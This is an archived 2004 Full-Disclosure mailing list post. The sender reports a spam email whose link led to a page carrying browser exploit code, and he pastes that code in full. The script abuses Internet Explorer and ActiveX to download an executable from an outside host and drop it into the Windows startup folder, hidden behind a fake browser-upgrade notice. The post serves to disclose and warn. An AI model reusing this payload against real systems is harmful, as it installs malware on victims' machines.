lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <413D7DB9.DF3FE8A0@gmx.de> From: shugal at gmx.de (Martin Stricker) Subject: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] I just got attached e-mail. On the linked website I found this exploit code (sorry for the line breaks): <script> function govuln(){ var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open ("GET","http://real.slon.biz/server.exe",false);xmlHTTP.send();var contents = xmlHTTP.responseBody;document.innerHTML=("<title>You Need a better browser</title><DIV ID=DS2 align=center style=position:absolute;left:10;top:-30;><br><br><center><font face=arial color=black><b>This web page requires Opera Comptable browser</b>&nbspYou can download Opera from the <a href=http://www.opera.com>Opera <frame src=log.php name=frame1 scrolling=no frameborder=no noresize=noresize>Software Group web site</a>.</center></div><html><iframe src=shell:startup HEIGHT=5000; WIDTH=5000 style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;></iframe><body onload=showpop()><script>function showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,screen.height+300);}</script><span style=position: absolute; left: 1; top: 1 id=absspan></span><textarea id=txt rows=1 cols=20 style=display:none><html><body><table width=100% height=100%><tr ALIGN=LEFT VALIGN=TOP><br><center><img src=http://real.slon.biz/server.exe id=anch onmousedown=parent.pop.show(1,1,1,1); style=width=4000px;height=4000px;background-image:url(&quot;http://real.slon.biz/1.gif&quot;);></a></td></tr></table></textarea></body></html>")');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); w.location.assign=location.assign; location.href="http://localhost"; } govuln() </script> -- Homepage: http://www.martin-stricker.de/ Linux Migration Project: http://www.linux-migration.org/ Webmaster-Forum: http://www.masterportal24.com/cgi-bin/yindex.cgi Red Hat Linux 9 for low memory: http://www.rule-project.org/ Registered Linux user #210635: http://counter.li.org/ -------------- next part -------------- An embedded message was scrubbed... From: CNN News Germany <gil@...v.de> Subject: George Bush sniper-rifle shot! Date: Sat, 04 Sep 2004 03:25:28 +0000 Size: 2407 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040907/14b5d37a/attachment.mht
Powered by blists - more mailing lists